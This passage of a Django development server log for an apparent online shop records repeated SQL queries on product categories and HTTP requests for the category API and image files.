"auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:21:57] "GET /jsi18n/ HTTP/1.0" 200 3223 [13/Dec/2019 13:24:03] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 13:25:23,398 utils 11259 139831317362432 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:25:23,409 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 13:25:23,414 utils 11259 139831552767744 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-13 13:25:23,419 utils 11259 139831317362432 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 13:25:23,422 utils 11259 139831552767744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 13:25:23,424 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 13:25:23,427 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) [13/Dec/2019 13:25:23] "GET /api/v1/categories/6 HTTP/1.0" 200 192 DEBUG 2019-12-13 13:25:23,430 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 13:25:23,433 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 13:25:23,435 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 13:25:23,437 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 13:25:23,440 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 13:25:23,442 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 13:25:23,445 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 13:25:23,447 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 13:25:23,449 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 13:25:23,452 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 13:25:23,455 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 13:25:23,457 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 13:25:23,459 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 13:25:23,462 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 13:25:23,464 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 13:25:23,468 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 13:25:23,471 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 13:25:23,474 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 13:25:23,476 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 13:25:23,479 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 13:25:23,481 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 13:25:23,483 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 13:25:23,486 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 13:25:23,488 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 13:25:23,491 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 13:25:23,493 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 13:25:23,495 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 13:25:23,497 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 13:25:23,500 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 13:25:23,502 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 13:25:23,505 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 13:25:23,507 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 13:25:23,509 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 13:25:23,511 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 13:25:23,514 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 13:25:23,516 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 13:25:23,518 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 13:25:23,521 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 13:25:23,523 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 13:25:23,525 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 13:25:23,527 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 13:25:23] "GET /api/v1/categories/ HTTP/1.0" 200 8596 [13/Dec/2019 13:25:24] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 200 387799 [13/Dec/2019 13:25:24] "GET /media/categories/2019/12/13/collection6_4Q1Rpjs.png HTTP/1.0" 304 0 [13/Dec/2019 13:25:24] "GET /media/categories/2019/12/13/collection6.png HTTP/1.0" 304 0 [13/Dec/2019 13:25:24] "GET /media/categories/2019/12/13/collection3.png HTTP/1.0" 304 0 [13/Dec/2019 13:25:24] "GET /media/categories/2019/12/13/collection6_YoOFERO.png HTTP/1.0" 304 0 [13/Dec/2019 13:25:24] "GET /media/categories/2019/12/13/collection3_3c60jfJ.png HTTP/1.0" 200 784410 [13/Dec/2019 13:25:24] "GET /media/categories/2019/12/13/popular3.png HTTP/1.0" 200 309908 [13/Dec/2019 13:25:25] "GET /media/categories/2019/12/13/collection4.png HTTP/1.0" 200 432480 [13/Dec/2019 13:25:26] "GET /media/categories/2019/12/13/collection3_blWHbYx.png HTTP/1.0" 200 784410 [13/Dec/2019 13:25:26] "GET /media/categories/2019/12/13/collection3_lEyiVWB.png HTTP/1.0" 200 784410 [13/Dec/2019 13:25:26] "GET /media/categories/2019/12/13/collection3_pKohXg6.png HTTP/1.0" 200 784410 [13/Dec/2019 13:25:28] "GET /media/categories/2019/12/13/collection3_rYale9k.png HTTP/1.0" 200 784410 [13/Dec/2019 13:25:28] "GET /media/categories/2019/12/13/collection3_O3U2Kj1.png HTTP/1.0" 200 784410 [13/Dec/2019 13:25:29] "GET /media/categories/2019/12/13/collection7_sU2pbFG.png HTTP/1.0" 200 379075 [13/Dec/2019 13:25:30] "GET /media/categories/2019/12/13/collection7_s1gVgUK.png HTTP/1.0" 200 379075 [13/Dec/2019 13:25:30] "GET /media/categories/2019/12/13/collection7_zgKzb94.png HTTP/1.0" 200 379075 [13/Dec/2019 13:25:31] "GET /media/categories/2019/12/13/collection7_ZCM4YHI.png HTTP/1.0" 200 379075 [13/Dec/2019 13:25:32] "GET /media/categories/2019/12/13/collection7.png HTTP/1.0" 200 379075 [13/Dec/2019 13:25:32] "GET /media/categories/2019/12/13/collection4_45IbUzs.png HTTP/1.0" 200 432480 [13/Dec/2019 13:25:32] "GET /media/categories/2019/12/13/collection4_klUHkrJ.png HTTP/1.0" 200 432480 [13/Dec/2019 13:25:33] "GET /media/categories/2019/12/13/collection4_wmrC3xY.png HTTP/1.0" 200 432480 [13/Dec/2019 13:25:34] "GET /media/categories/2019/12/13/collection4_ykrPiOh.png HTTP/1.0" 200 432480 [13/Dec/2019 13:25:34] "GET /media/categories/2019/12/13/collection8_98NdtQd.png HTTP/1.0" 200 376652 [13/Dec/2019 13:25:34] "GET /media/categories/2019/12/13/collection8_qT6o4Ze.png HTTP/1.0" 200 376652 [13/Dec/2019 13:25:35] "GET /media/categories/2019/12/13/collection8_MKX5n4Y.png HTTP/1.0" 200 376652 [13/Dec/2019 13:25:36] "GET /media/categories/2019/12/13/collection8.png HTTP/1.0" 200 376652 [13/Dec/2019 13:25:36] "GET /media/categories/2019/12/13/collection5_NjJaGxE.png HTTP/1.0" 200 454674 [13/Dec/2019 13:25:36] "GET /media/categories/2019/12/13/collection5_DOY3fSw.png HTTP/1.0" 200 454674 [13/Dec/2019 13:25:37] "GET /media/categories/2019/12/13/collection5_J2Tl3z7.png HTTP/1.0" 200 454674 [13/Dec/2019 13:25:37] "GET /media/categories/2019/12/13/collection5_VsJvXmq.png HTTP/1.0" 200 454674 [13/Dec/2019 13:25:38] "GET /media/categories/2019/12/13/collection5.png HTTP/1.0" 200 454674 [13/Dec/2019 13:25:39] "GET /media/categories/2019/12/13/weapons2.png HTTP/1.0" 200 523712 [13/Dec/2019 13:25:39] "GET /media/categories/2019/12/13/weapons1.png HTTP/1.0" 200 700594 [13/Dec/2019 13:25:40] "GET /media/categories/2019/12/13/collection9.png HTTP/1.0" 200 284188 [13/Dec/2019 13:25:41] "GET /media/categories/2019/12/13/collection9_y5Aperx.png HTTP/1.0" 200 284188 DEBUG 2019-12-13 13:25:42,048 utils 11259 139831552767744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:25:42,054 utils 11259 139831317362432 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-13 13:25:42,058 utils 11259 139831552767744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 13:25:42,060 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 13:25:42,062 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 13:25:42,065 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) [13/Dec/2019 13:25:42] "GET /api/v1/categories/6 HTTP/1.0" 200 192 DEBUG 2019-12-13 13:25:42,068 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 13:25:42,070 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 13:25:42,073 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 13:25:42,075 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", 